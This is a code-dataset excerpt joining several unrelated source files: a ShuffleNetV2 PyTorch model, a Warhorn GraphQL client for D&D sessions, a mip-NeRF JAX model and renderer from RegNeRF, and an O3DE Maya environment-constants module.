                      bias=False, groups=self.in_channels),
            nn.BatchNorm2d(self.in_channels),
            nn.Conv2d(self.in_channels, half_out, kernel_size=1, stride=1, bias=False),
            nn.BatchNorm2d(half_out),
            nn.ReLU(inplace=True),
        )
        # Right branch: 1x1 -> 3x3 depthwise (stride 2) -> 1x1.
        self.right = nn.Sequential(
            nn.Conv2d(self.in_channels, self.in_channels, kernel_size=1, stride=1, bias=False),
            nn.BatchNorm2d(self.in_channels),
            nn.ReLU(inplace=True),
            nn.Conv2d(self.in_channels, self.in_channels, kernel_size=3, stride=2,
                      bias=False, groups=self.in_channels),
            nn.BatchNorm2d(self.in_channels),
            nn.Conv2d(self.in_channels, half_out, kernel_size=1, stride=1, bias=False),
            nn.BatchNorm2d(half_out),
            nn.ReLU(inplace=True),
        )
        init_weights(self)

    def forward(self, x):
        """Run both branches on the full input, concat channels, shuffle."""
        combined = torch.cat([self.left(x), self.right(x)], dim=1)
        return channel_shuffle(combined, self.groups)
class ShuffleNetV2(nn.Module):
    """ShuffleNetV2 classifier; widths/depths come from the config module.

    Args:
        n_class: number of output classes for the final linear layer.
        net_size: key into config.net_size selecting the channel widths.
    """

    def __init__(self, n_class, net_size):
        super(ShuffleNetV2, self).__init__()
        widths = config.net_size[net_size]
        depths = config.net_blocks
        self.conv1 = conv(in_channels=3, out_channels=widths[0],
                          kernel_size=config.conv1_kernel_size,
                          stride=config.conv1_stride)
        self.in_channels = widths[0]
        self.stage2 = self._make_stage(widths[1], depths[0])
        self.stage3 = self._make_stage(widths[2], depths[1])
        # self.stage4 = self._make_stage(widths[3], depths[2])
        self.conv5 = conv(in_channels=widths[2],
                          out_channels=widths[3],
                          kernel_size=config.conv5_kernel_size,
                          stride=config.conv5_stride)
        self.global_pool = nn.AvgPool2d(kernel_size=config.global_pool_kernel_size)
        self.fc = nn.Linear(widths[3], n_class)

    def _make_stage(self, out_channels, num_blocks):
        """Build one stage: a DownUnit followed by num_blocks BasicUnits."""
        units = [DownUnit(self.in_channels, out_channels)]
        units.extend(BasicUnit(out_channels) for _ in range(num_blocks))
        self.in_channels = out_channels  # track width for the next stage
        return nn.Sequential(*units)

    def forward(self, x):
        """Feature extraction, global average pool, then the classifier head."""
        features = self.conv1(x)
        features = self.stage2(features)
        features = self.stage3(features)
        # features = self.stage4(features)
        features = self.conv5(features)
        pooled = self.global_pool(features)
        flat = pooled.view(pooled.size(0), -1)  # flatten
        return self.fc(flat)
def test():
    """Smoke test: forward a random batch through a small ShuffleNetV2."""
    net = ShuffleNetV2(2300, 2)
    sample = Variable(torch.randn(3, 3, 32, 32))
    out = net(sample)
    print("end", out.size())


if __name__ == '__main__':
    test()
| 2.453125 | 2 |
warhorn_api.py | jagerkin/warbot | 1 | 17642 | <gh_stars>1-10
# Copyright 2021 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Warhorn GraphQL client."""
import collections.abc
import datetime
import logging
from typing import AsyncGenerator, Dict, Optional, Sequence, Tuple, Union
import pytz
from gql import gql, Client
from gql.transport.aiohttp import AIOHTTPTransport
from gql.transport.aiohttp import log as gql_logger
_QUERY = '''\
{{
eventSessions(
events: ["{slug}"],
startsAfter: "{startsAfter}") {{
nodes {{
status
scenario {{
name
}}
scenarioOffering {{
customName
}}
signupUrl
uuid
slot {{
timezone
startsAt
endsAt
}}
}}
}}
}}'''
_GQLNode = Optional[Union[str, Dict[str, '_GQLNode'], Sequence['_GQLNode']]]
class GraphNode:
    """Wrapper for GraphQL nodes that don't make the type system (or me) cry."""

    __slots__ = ('_node', )

    def __init__(self, node: '_GQLNode') -> None:
        """Wrap a raw GraphQL result node (may be None).

        Args:
            node: GraphQL result node.
        """
        self._node = node

    def path(self, *path: str) -> 'GraphNode':  # pylint: disable=used-before-assignment
        """Navigate *path* keys through nested mappings.

        Args:
            path: Sequence of key values to lookup.

        Returns:
            Node navigated to, or a None node if no such node existed.
        """
        current = self._node
        for key in path:
            if isinstance(current, dict):
                current = current.get(key)
            else:
                return GraphNode(None)
        return GraphNode(current)

    @property
    def str(self) -> str:
        """Return the node as a string if it is one, else ''."""
        value = self._node
        return value if isinstance(value, str) else ''

    @property
    def tuple(self) -> Tuple['GraphNode', ...]:
        """Return the node as a Tuple of GraphNodes if it's a sequence, else an empty tuple."""
        value = self._node
        if not isinstance(value, collections.abc.Sequence):
            return tuple()
        return tuple(GraphNode(child) for child in value)
def _strings_exists(*strings: str) -> bool:
"""Check that all of the strings exist and none of them are just the str 'None'."""
for s in strings:
if s in ('', 'None'):
return False
return True
class Game:
    """Game holds the key information about a Warhorn D&D session."""

    __slots__ = 'uuid', 'name', 'url', 'status', 'starts', 'ends'

    def __init__(self, session: 'GraphNode') -> None:
        """Init new Game.

        Args:
            session: Warhorn GraphQL session node to extract game data from.

        Throws:
            ValueError: in the event of key missing values, like a start time.
        """
        # Warhorn session UUID.
        self.uuid = session.path('uuid').str
        # Prefer the organizer's custom name over the scenario's own name.
        custom_name = session.path('scenarioOffering', 'customName').str
        self.name = custom_name or session.path('scenario', 'name').str
        # Warhorn session signup URL.
        self.url = session.path('signupUrl').str
        # Warhorn session status. (e.g. PUBLISHED, DRAFT, CANCELED)
        self.status = session.path('status').str
        start_str = session.path('slot', 'startsAt').str
        end_str = session.path('slot', 'endsAt').str
        tz_name = session.path('slot', 'timezone').str or 'US/Pacific'
        if not _strings_exists(self.uuid, self.name, self.status, self.url,
                               start_str, end_str, tz_name):
            raise ValueError(f'Missing key values for game session: {session}')
        zone = pytz.timezone(tz_name)
        # Game start/end times, localized to the slot's timezone.
        self.starts = datetime.datetime.fromisoformat(start_str).astimezone(zone)
        self.ends = datetime.datetime.fromisoformat(end_str).astimezone(zone)

    @property
    def time(self) -> str:
        """String describing game start/end time."""
        return f'{self.starts:%-I:%M%p} - {self.ends:%-I:%M%p %Z %b %d, %Y}'

    def __repr__(self) -> str:
        return f'Game("{self.name}", {self.time}, {self.status}, uuid: {self.uuid})'
class WarhornAPI:  # pylint: disable=too-few-public-methods
    """Warhorn client API."""

    def __init__(self, url: str='https://warhorn.net/graphql', token: str='') -> None:
        """Init Warhorn client.

        Args:
            url: Warhorn GraphQL endpoint.
            token: optional bearer token; when set, sent as an
                Authorization header on every request.
        """
        headers = {}
        if token:
            headers['Authorization'] = f'Bearer {token}'
        self._transport = AIOHTTPTransport(url=url, headers=headers)
        self._client = Client(transport=self._transport, fetch_schema_from_transport=False)
        # gql's transport logger is chatty at INFO level; quiet it down.
        gql_logger.setLevel(logging.WARNING)  # type: ignore

    async def get_games(
            self, slug: str, starts_after: Optional[datetime.datetime]=None
    ) -> AsyncGenerator[Game, None]:
        """Query Warhorn for games.

        Args:
            slug: identifying string for the warhorn event.
            starts_after: Only return Games beginning after this time
                (defaults to now).

        Returns:
            Generator of Game objects for every PUBLISHED session.
        """
        starts_after = starts_after if starts_after else datetime.datetime.now()
        q = _QUERY.format(slug=slug, startsAfter=starts_after.isoformat())
        query = gql(q)
        result = GraphNode(await self._client.execute_async(query))  # type: ignore
        for session in result.path('eventSessions', 'nodes').tuple:
            status = session.path('status').str
            if status not in ('PUBLISHED', 'DRAFT', 'CANCELED'):
                # Bug fix: logging.warn() is a deprecated alias; use warning().
                logging.warning('Unexpected sessions status: %s', session)
            if status != 'PUBLISHED':
                continue
            yield Game(session)
| 2.015625 | 2 |
regnerf/internal/models.py | gunpowder78/google-research | 1 | 17643 | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Different model implementation plus a general port for all the models."""
import functools
from typing import Any, Callable
from flax import linen as nn
import gin
from internal import mip, utils # pylint: disable=g-multiple-import
import jax
from jax import random
import jax.numpy as jnp
@gin.configurable
class MipNerfModel(nn.Module):
  """Nerf NN Model with both coarse and fine MLPs."""
  config: Any = None  # A Config class, must be set upon construction.
  num_samples: int = 128  # The number of samples per level.
  num_levels: int = 2  # The number of sampling levels.
  stop_level_grad: bool = True  # If True, don't backprop across levels.
  use_viewdirs: bool = True  # If True, use view directions as input.
  genspace_fn: Callable[Ellipsis, Any] = None  # The genspace() curve function.
  ray_shape: str = 'cone'  # The shape of cast rays ('cone' or 'cylinder').
  disable_integration: bool = False  # If True, use PE instead of IPE.
  single_jitter: bool = False  # If True, jitter whole rays instead of samples.

  @nn.compact
  def __call__(
      self,
      rng,
      rays,
      resample_padding,
      compute_extras,
  ):
    """The mip-NeRF Model.

    Args:
      rng: random number generator (or None for deterministic output).
      rays: util.Rays, a pytree of ray origins, directions, and viewdirs.
      resample_padding: float, the histogram padding to use when resampling.
      compute_extras: bool, if True, compute extra quantities besides color.

    Returns:
      ret: list, [*(rgb, distance, acc)]
    """
    # Construct the MLP. A single MLP instance is reused across all levels.
    mlp = MLP()

    renderings = []
    for i_level in range(self.num_levels):
      # Split off a fresh key per level so each level's sampling differs.
      if rng is None:
        key = None
      else:
        key, rng = random.split(rng)

      if i_level == 0:
        # Stratified sampling along rays
        t_vals, samples = mip.sample_along_rays(
            key,
            rays.origins,
            rays.directions,
            rays.radii,
            self.num_samples,
            rays.near,
            rays.far,
            self.genspace_fn,
            self.ray_shape,
            self.single_jitter,
        )
      else:
        # Hierarchical resampling: `weights` carries over from the previous
        # level's volumetric rendering (assigned at the bottom of this loop).
        t_vals, samples = mip.resample_along_rays(
            key,
            rays.origins,
            rays.directions,
            rays.radii,
            t_vals,
            weights,
            self.ray_shape,
            self.stop_level_grad,
            resample_padding,
            self.single_jitter,
        )
      if self.disable_integration:
        # Zero the covariances so the IPE degenerates to plain PE.
        samples = (samples[0], jnp.zeros_like(samples[1]))

      # Point attribute predictions
      if self.use_viewdirs:
        (rgb, density, normals) = mlp(rng, samples, rays.viewdirs)
      else:
        (rgb, density, normals) = mlp(rng, samples, None)

      # Volumetric rendering. `weights` feeds the next level's resampling.
      weights, _, _, delta = mip.compute_alpha_weights(
          density, t_vals, rays.directions)

      rendering = mip.volumetric_rendering(
          rgb,
          weights,
          normals,
          t_vals,
          self.config.white_background,
          self.config.vis_num_rays,
          compute_extras,
          delta,
      )

      renderings.append(rendering)

    return renderings
def construct_mipnerf(rng, rays, config):
  """Construct a Neural Radiance Field.

  Args:
    rng: jnp.ndarray. Random number generator.
    rays: an example of input Rays.
    config: A Config class.

  Returns:
    model: nn.Model. Nerf model with parameters.
    state: flax.Module.state. Nerf model state for stateful parameters.
  """
  # Initialize on a tiny (10-ray) slice to keep construction memory low.
  def _first_ten(x):
    return jnp.reshape(x, [-1, x.shape[-1]])[:10]

  sample_rays = jax.tree_map(_first_ten, rays)
  model = MipNerfModel(config=config)
  init_variables = model.init(
      rng, rng=None, rays=sample_rays, resample_padding=0., compute_extras=False)
  return model, init_variables
def cosine_easing_window(alpha, min_freq_log2=0, max_freq_log2=16):
  """Eases in each frequency one by one with a cosine.

  This is equivalent to taking a Tukey window and sliding it to the right
  along the frequency spectrum.

  Args:
    alpha: will ease in each frequency as alpha goes from 0.0 to num_freqs.
    min_freq_log2: the lower frequency band.
    max_freq_log2: the upper frequency band.

  Returns:
    A 1-d numpy array with num_sample elements containing the window.
  """
  num_bands = max_freq_log2 - min_freq_log2
  freq_bands = jnp.linspace(min_freq_log2, max_freq_log2, num_bands)
  eased = jnp.clip(alpha - freq_bands, 0.0, 1.0)
  # Half-cosine ramp: 0 at eased == 0, 1 at eased == 1.
  window = 0.5 * (1.0 - jnp.cos(jnp.pi * eased))
  window = window.reshape(-1)
  # always set first 4 freqs to 1
  window = jnp.concatenate([jnp.ones_like(window[:4]), window[4:]])
  # Repeat each scalar across the 3 spatial dims, then duplicate the row.
  window = jnp.repeat(window[:, None], 3, axis=1).reshape(-1)
  return jnp.stack([window, window])
@gin.configurable
class MLP(nn.Module):
  """A simple MLP."""
  net_depth: int = 8  # The depth of the first part of MLP.
  net_width: int = 256  # The width of the first part of MLP.
  net_depth_viewdirs: int = 1  # The depth of the second part of MLP.
  net_width_viewdirs: int = 128  # The width of the second part of MLP.
  net_activation: Callable[Ellipsis, Any] = nn.relu  # The activation function.
  # Initializer for the weights of the MLP.
  weight_init: Callable[Ellipsis, Any] = jax.nn.initializers.glorot_uniform()
  skip_layer: int = 4  # Add a skip connection to the output of every N layers.
  num_rgb_channels: int = 3  # The number of RGB channels.
  min_deg_point: int = 0  # Min degree of positional encoding for 3D points.
  max_deg_point: int = 16  # Max degree of positional encoding for 3D points.
  deg_view: int = 4  # Degree of positional encoding for viewdirs.
  density_activation: Callable[Ellipsis, Any] = nn.softplus  # Density activation.
  density_noise: float = 0.  # Standard deviation of noise added to raw density.
  density_bias: float = -1.  # The shift added to raw densities pre-activation.
  rgb_activation: Callable[Ellipsis, Any] = nn.sigmoid  # The RGB activation.
  rgb_padding: float = 0.001  # Padding added to the RGB outputs.
  disable_normals: bool = False  # If True, don't bother computing normals.

  @nn.compact
  def __call__(self, rng, samples, viewdirs=None):
    """Evaluate the MLP.

    Args:
      rng: random number generator (or None for deterministic output).
      samples: a tuple containing:
        - mean: [..., num_samples, 3], coordinate means, and
        - cov: [..., num_samples, 3{, 3}], coordinate covariance matrices.
      viewdirs: jnp.ndarray(float32), [batch, 3], if not None, this variable
        will be part of the input to the second part of the MLP concatenated
        with the output vector of the first part of the MLP. If None, only the
        first part of the MLP will be used with input x. In the original paper,
        this variable is the view direction.

    Returns:
      rgb: jnp.ndarray(float32), with a shape of [..., num_rgb_channels].
      density: jnp.ndarray(float32), with a shape of [...].
      normals: jnp.ndarray(float32), with a shape of [..., 3].
    """
    dense_layer = functools.partial(nn.Dense, kernel_init=self.weight_init)

    def predict_density(rng, means, covs):
      """Helper function to output density."""
      # Encode input positions
      inputs = mip.integrated_pos_enc(
          (means, covs), self.min_deg_point, self.max_deg_point)
      # Evaluate network to output density
      x = inputs
      for i in range(self.net_depth):
        x = dense_layer(self.net_width)(x)
        x = self.net_activation(x)
        if i % self.skip_layer == 0 and i > 0:
          # Skip connection: concatenate the encoded input back in.
          x = jnp.concatenate([x, inputs], axis=-1)
      raw_density = dense_layer(1)(x)[Ellipsis, 0]  # Hardcoded to a single channel.

      # Add noise to regularize the density predictions if needed.
      if (rng is not None) and (self.density_noise > 0):
        key, rng = random.split(rng)
        raw_density += self.density_noise * random.normal(
            key, raw_density.shape, dtype=raw_density.dtype)

      # Apply bias and activation to raw density
      density = self.density_activation(raw_density + self.density_bias)
      return density, x

    means, covs = samples
    if self.disable_normals:
      density, x = predict_density(rng, means, covs)
      # Normals are skipped; emit NaNs of the right shape as placeholders.
      normals = jnp.full_like(means, fill_value=jnp.nan)
    else:
      # Flatten the input so value_and_grad can be vmap'ed.
      means_flat = means.reshape([-1, means.shape[-1]])
      covs_flat = covs.reshape([-1] + list(covs.shape[len(means.shape) - 1:]))

      # Evaluate the network and its gradient on the flattened input.
      # argnums=1 differentiates density w.r.t. the means (positions).
      predict_density_and_grad_fn = jax.vmap(
          jax.value_and_grad(predict_density, argnums=1, has_aux=True),
          in_axes=(None, 0, 0))
      (density_flat, x_flat), density_grad_flat = (
          predict_density_and_grad_fn(rng, means_flat, covs_flat))

      # Unflatten the output.
      density = density_flat.reshape(means.shape[:-1])
      x = x_flat.reshape(list(means.shape[:-1]) + [x_flat.shape[-1]])
      density_grad = density_grad_flat.reshape(means.shape)

      # Compute surface normals as negative normalized density gradient
      # (eps guards against division by zero for vanishing gradients).
      eps = jnp.finfo(jnp.float32).eps
      normals = -density_grad / jnp.sqrt(
          jnp.maximum(jnp.sum(density_grad**2, axis=-1, keepdims=True), eps))

    if viewdirs is not None:
      viewdirs_enc = mip.pos_enc(
          viewdirs, min_deg=0, max_deg=self.deg_view, append_identity=True)

      # Output of the first part of MLP.
      bottleneck = dense_layer(self.net_width)(x)

      # Broadcast the per-ray view encoding across the sample dimension.
      viewdirs_enc = jnp.broadcast_to(
          viewdirs_enc[Ellipsis, None, :],
          list(bottleneck.shape[:-1]) + [viewdirs_enc.shape[-1]])
      x = jnp.concatenate([bottleneck, viewdirs_enc], axis=-1)

      # Here use 1 extra layer to align with the original nerf model.
      for _ in range(self.net_depth_viewdirs):
        x = dense_layer(self.net_width_viewdirs)(x)
        x = self.net_activation(x)

    rgb = self.rgb_activation(dense_layer(self.num_rgb_channels)(x))
    # Widen the sigmoid output slightly so exact 0/1 targets are reachable.
    rgb = rgb * (1 + 2 * self.rgb_padding) - self.rgb_padding
    return (rgb, density, normals)
def render_image(render_fn, rays, rng, config):
  """Render all the pixels of an image (in test mode).

  Args:
    render_fn: function, jit-ed render function.
    rays: a `Rays` pytree, the rays to be rendered.
    rng: jnp.ndarray, random number generator (used in training mode only).
    config: A Config class.

  Returns:
    rgb: jnp.ndarray, rendered color image.
    disp: jnp.ndarray, rendered disparity image.
    acc: jnp.ndarray, rendered accumulated weights per pixel.
  """
  height, width = rays.origins.shape[:2]
  num_rays = height * width
  # Flatten the image grid into one long list of rays.
  rays = jax.tree_map(lambda r: r.reshape((num_rays, -1)), rays)

  host_id = jax.host_id()
  chunks = []
  idx0s = range(0, num_rays, config.render_chunk_size)
  for i_chunk, idx0 in enumerate(idx0s):
    # pylint: disable=cell-var-from-loop
    if i_chunk % max(1, len(idx0s) // 10) == 0:
      print(f'Rendering chunk {i_chunk}/{len(idx0s)-1}')
    chunk_rays = (
        jax.tree_map(lambda r: r[idx0:idx0 + config.render_chunk_size], rays))

    actual_chunk_size = chunk_rays.origins.shape[0]
    rays_remaining = actual_chunk_size % jax.device_count()
    if rays_remaining != 0:
      # Edge-pad so the chunk divides evenly across devices; the padding is
      # stripped again by utils.unshard below.
      padding = jax.device_count() - rays_remaining
      chunk_rays = jax.tree_map(
          lambda r: jnp.pad(r, ((0, padding), (0, 0)), mode='edge'), chunk_rays)
    else:
      padding = 0
    # After padding the number of chunk_rays is always divisible by host_count.
    rays_per_host = chunk_rays.origins.shape[0] // jax.host_count()
    start, stop = host_id * rays_per_host, (host_id + 1) * rays_per_host
    chunk_rays = jax.tree_map(lambda r: utils.shard(r[start:stop]), chunk_rays)
    chunk_renderings = render_fn(rng, chunk_rays)

    # Unshard the renderings
    chunk_renderings = [{k: utils.unshard(v[0], padding)
                         for k, v in r.items()}
                        for r in chunk_renderings]

    # Keep only the final level's rendering, but gather the per-level
    # 'ray_*' diagnostic entries from every level into lists.
    chunk_rendering = chunk_renderings[-1]
    keys = [k for k in chunk_renderings[0] if k.find('ray_') == 0]
    for k in keys:
      chunk_rendering[k] = [r[k] for r in chunk_renderings]

    chunks.append(chunk_rendering)

  rendering = {}
  for k in chunks[0]:
    if isinstance(chunks[0][k], list):
      # Per-level lists: concatenate each level's entries across chunks.
      rendering[k] = [r[k] for r in chunks]
      ds = range(len(rendering[k][0]))
      rendering[k] = [jnp.concatenate([r[d] for r in rendering[k]]) for d in ds]
    else:
      # Per-pixel outputs: concatenate chunks and restore the image shape.
      rendering[k] = jnp.concatenate([r[k] for r in chunks])
      rendering[k] = (
          rendering[k].reshape((height, width) + chunks[0][k].shape[1:]))

  # After all of the ray bundles have been concatenated together, extract a
  # new random bundle (deterministically) from the concatenation that is the
  # same size as one of the individual bundles.
  keys = [k for k in rendering if k.find('ray_') == 0]
  if keys:
    ray_idx = random.permutation(
        random.PRNGKey(0), rendering[keys[0]][0].shape[0])[:config.vis_num_rays]
    for k in keys:
      rendering[k] = [r[ray_idx] for r in rendering[k]]

  return rendering
| 1.820313 | 2 |
Gems/AtomLyIntegration/TechnicalArt/DccScriptingInterface/Tools/DCC/Maya/constants.py | prophetl33t/o3de | 0 | 17644 | <reponame>prophetl33t/o3de
# coding:utf-8
#!/usr/bin/python
#
# Copyright (c) Contributors to the Open 3D Engine Project.
# For complete copyright and license terms please see the LICENSE at the root of this distribution.
#
# SPDX-License-Identifier: Apache-2.0 OR MIT
#
#
# -------------------------------------------------------------------------
"""! @brief
Module Documentation:
< DCCsi >:: Tools/DCC/Maya/constants.py
This module contains default values for commony used constants & strings.
We can make an update here easily that is propogated elsewhere.
"""
# -------------------------------------------------------------------------
# built-ins
import sys
import os
import site
import timeit
import inspect
from os.path import expanduser
from pathlib import Path
import logging as _logging
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
_START = timeit.default_timer()  # start tracking module import time

# global scope
_MODULENAME = 'Tools.DCC.Maya.constants'
_LOGGER = _logging.getLogger(_MODULENAME)
# NOTE(review): {_MODULENAME} is a *set* literal, so this logs e.g.
# "Initializing: {'Tools.DCC.Maya.constants'}." — probably meant _MODULENAME.
_LOGGER.debug('Initializing: {}.'.format({_MODULENAME}))
# -------------------------------------------------------------------------


# -------------------------------------------------------------------------
# Maya is frozen
# module path when frozen
_MODULE_PATH = Path(os.path.abspath(inspect.getfile(inspect.currentframe())))
_LOGGER.debug('_MODULE_PATH: {}'.format(_MODULE_PATH))

# Walk up the folder tree: .../Tools/DCC/Maya -> DCC -> Tools -> DCCsi root.
# Each level can be overridden by an environment variable of the same name.
_PATH_DCCSI_TOOLS_MAYA = Path(_MODULE_PATH.parent)
_PATH_DCCSI_TOOLS_MAYA = Path(os.getenv('PATH_DCCSI_TOOLS_MAYA',
                                        _PATH_DCCSI_TOOLS_MAYA.as_posix()))

_PATH_DCCSI_TOOLS_DCC = Path(_PATH_DCCSI_TOOLS_MAYA.parent)
_PATH_DCCSI_TOOLS_DCC = Path(os.getenv('PATH_DCCSI_TOOLS_DCC',
                                       _PATH_DCCSI_TOOLS_DCC.as_posix()))

_PATH_DCCSI_TOOLS = Path(_PATH_DCCSI_TOOLS_DCC.parent)
_PATH_DCCSI_TOOLS = Path(os.getenv('PATH_DCCSI_TOOLS',
                                   _PATH_DCCSI_TOOLS.as_posix()))

# we need to set up basic access to the DCCsi
_PATH_DCCSIG = Path(_PATH_DCCSI_TOOLS.parent)
_PATH_DCCSIG = Path(os.getenv('PATH_DCCSIG', _PATH_DCCSIG.as_posix()))
site.addsitedir(_PATH_DCCSIG.as_posix())
_LOGGER.debug('_PATH_DCCSIG: {}'.format(_PATH_DCCSIG.as_posix()))

# this is the shared default requirements.txt file to install for python 3.6.x+
DCCSI_PYTHON_REQUIREMENTS = Path(_PATH_DCCSIG, 'requirements.txt').as_posix()
# if using maya 2020 or less with py2.7 override with and use the one here:
# "DccScriptingInterface\Tools\DCC\Maya\requirements.txt"
# if using maya 2020 or less with py2.7 override with and use the one here:
# "DccScriptingInterface\Tools\DCC\Maya\requirements.txt"
# now we have azpy api access
from azpy.env_bool import env_bool
from azpy.constants import ENVAR_DCCSI_GDEBUG
from azpy.constants import ENVAR_DCCSI_DEV_MODE
from azpy.constants import ENVAR_DCCSI_LOGLEVEL
from azpy.constants import ENVAR_DCCSI_GDEBUGGER
from azpy.constants import FRMT_LOG_LONG
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
from azpy.constants import * # but here are the specific ones we are gonna use
from azpy.constants import PATH_PROGRAMFILES_X64
from azpy.constants import TAG_PY_MAJOR
from azpy.constants import TAG_PY_MINOR
from azpy.constants import PATH_USER_HOME
from azpy.constants import PATH_USER_O3DE
from azpy.constants import ENVAR_O3DE_DEV
from azpy.constants import PATH_O3DE_DEV
from azpy.constants import ENVAR_PATH_DCCSIG
from azpy.constants import PATH_DCCSIG
from azpy.constants import ENVAR_DCCSI_LOG_PATH
from azpy.constants import PATH_DCCSI_LOG_PATH
from azpy.constants import ENVAR_DCCSI_PY_VERSION_MAJOR
from azpy.constants import ENVAR_DCCSI_PY_VERSION_MINOR
from azpy.constants import ENVAR_PATH_DCCSI_PYTHON_LIB
from azpy.constants import STR_PATH_DCCSI_PYTHON_LIB
from azpy.constants import PATH_DCCSI_PYTHON_LIB
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# dcc: Maya ENVAR constants
# dcc: Maya ENVAR constants
# Names of the environment variables consumed/produced by the DCCsi Maya
# integration. Values are plain string literals; the previous redundant
# str("...") wrappers have been removed (idiom — values are unchanged).
ENVAR_DCCSI_PY_VERSION_MAJOR = "DCCSI_PY_VERSION_MAJOR"
ENVAR_DCCSI_PY_VERSION_MINOR = "DCCSI_PY_VERSION_MINOR"
ENVAR_DCCSI_PY_VERSION_RELEASE = "DCCSI_PY_VERSION_RELEASE"
ENVAR_MAYA_NO_CONSOLE_WINDOW = "MAYA_NO_CONSOLE_WINDOW"
ENVAR_MAYA_SHOW_OUTPUT_WINDOW = "MAYA_SHOW_OUTPUT_WINDOW"

# Bootstrap file tags (file names, not envar names).
TAG_O3DE_DCC_MAYA_MEL = 'dccsi_setup.mel'
TAG_MAYA_WORKSPACE = 'workspace.mel'

ENVAR_DCCSI_PY_MAYA = 'DCCSI_PY_MAYA'
ENVAR_MAYA_VERSION = 'MAYA_VERSION'
ENVAR_MAYA_LOCATION = 'MAYA_LOCATION'
ENVAR_PATH_DCCSI_TOOLS_MAYA = 'PATH_DCCSI_TOOLS_MAYA'
ENVAR_MAYA_MODULE_PATH = 'MAYA_MODULE_PATH'
ENVAR_MAYA_BIN_PATH = 'MAYA_BIN_PATH'
ENVAR_DCCSI_MAYA_PLUG_IN_PATH = 'DCCSI_MAYA_PLUG_IN_PATH'
ENVAR_MAYA_PLUG_IN_PATH = 'MAYA_PLUG_IN_PATH'
ENVAR_DCCSI_MAYA_SHELF_PATH = 'DCCSI_MAYA_SHELF_PATH'
ENVAR_MAYA_SHELF_PATH = 'MAYA_SHELF_PATH'
ENVAR_DCCSI_MAYA_XBMLANGPATH = 'DCCSI_MAYA_XBMLANGPATH'
ENVAR_XBMLANGPATH = 'XBMLANGPATH'
ENVAR_DCCSI_MAYA_SCRIPT_MEL_PATH = 'DCCSI_MAYA_SCRIPT_MEL_PATH'
ENVAR_DCCSI_MAYA_SCRIPT_PY_PATH = 'DCCSI_MAYA_SCRIPT_PY_PATH'
ENVAR_DCCSI_MAYA_SCRIPT_PATH = "DCCSI_MAYA_SCRIPT_PATH"
ENVAR_MAYA_SCRIPT_PATH = 'MAYA_SCRIPT_PATH'
ENVAR_DCCSI_MAYA_SET_CALLBACKS = 'DCCSI_MAYA_SET_CALLBACKS'
ENVAR_MAYA_VP2_DEVICE_OVERRIDE = "MAYA_VP2_DEVICE_OVERRIDE"
ENVAR_MAYA_OGS_DEVICE_OVERRIDE = "MAYA_OGS_DEVICE_OVERRIDE"
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# Maya consts
#USER_HOME = Path.home()
# mimicing all values from: "DccScriptingInterface\Tools\Dev\Windows\Env_DCC_Maya.bat"
# note: these are just default values, they are only initially CONST
# if/when imported from here (constants.py)
DCCSI_PY_VERSION_MAJOR = 3
DCCSI_PY_VERSION_MINOR = 7
DCCSI_PY_VERSION_RELEASE = 7

# override with maya defaults
PATH_DCCSI_PYTHON_LIB = STR_PATH_DCCSI_PYTHON_LIB.format(_PATH_DCCSIG,
                                                         DCCSI_PY_VERSION_MAJOR,
                                                         DCCSI_PY_VERSION_MINOR)

# not actually a maya envar, to do: could rename DCCSI_MAYA_VERSION
MAYA_VERSION = 2022

# is a maya envar
MAYA_PROJECT = _PATH_DCCSIG.as_posix()

PATH_DCCSI_TOOLS_MAYA = _PATH_DCCSI_TOOLS_MAYA.as_posix()

# is a maya envar
MAYA_MODULE_PATH = _PATH_DCCSI_TOOLS_MAYA.as_posix()

# is a maya envar
# NOTE(review): Windows-only default install location for the given version.
MAYA_LOCATION = Path(PATH_PROGRAMFILES_X64, 'Autodesk', 'Maya{}'.format(MAYA_VERSION)).as_posix()

# is a maya envar
MAYA_BIN_PATH = Path(MAYA_LOCATION, 'bin').as_posix()

DCCSI_MAYA_SET_CALLBACKS = True

# is a maya envar
MAYA_NO_CONSOLE_WINDOW = False
MAYA_SHOW_OUTPUT_WINDOW = True

# Executables under the Maya install; mayapy is Maya's bundled interpreter.
DCCSI_MAYA_EXE = Path(MAYA_BIN_PATH, 'maya.exe')
DCCSI_MAYABATCH_EXE = Path(MAYA_BIN_PATH, 'mayabatch.exe')
DCCSI_PY_MAYA = Path(MAYA_BIN_PATH, 'mayapy.exe')

# this is transient and will always track the exe this script is executing on
O3DE_PY_EXE = Path(sys.executable).as_posix()
DCCSI_PY_IDE = Path(DCCSI_PY_MAYA).as_posix()

DCCSI_MAYA_PLUG_IN_PATH = Path(PATH_DCCSI_TOOLS_MAYA, 'plugins').as_posix()
# is a maya envar
MAYA_PLUG_IN_PATH = Path(DCCSI_MAYA_PLUG_IN_PATH).as_posix()  # extend %MAYA_PLUG_IN_PATH%
# to do: remove or extend next PR, technically there can be more then one plugin path
#while MAYA_PLUG_IN_PATH:
    #if ENVAR_MAYA_PLUG_IN_PATH in os.environ:
        #maya_plug_pathlist = os.getenv(ENVAR_MAYA_PLUG_IN_PATH).split(os.pathsep)
        #maya_plug_new_pathlist = maya_plug_pathlist.copy()
        #maya_plug_new_pathlist.insert(0, Path(DCCSI_MAYA_PLUG_IN_PATH).as_posix())
        #os.environ[ENVAR_MAYA_PLUG_IN_PATH] = os.pathsep.join(maya_plug_new_pathlist)
    #else:
        #os.environ[ENVAR_MAYA_PLUG_IN_PATH] = DCCSI_MAYA_PLUG_IN_PATH
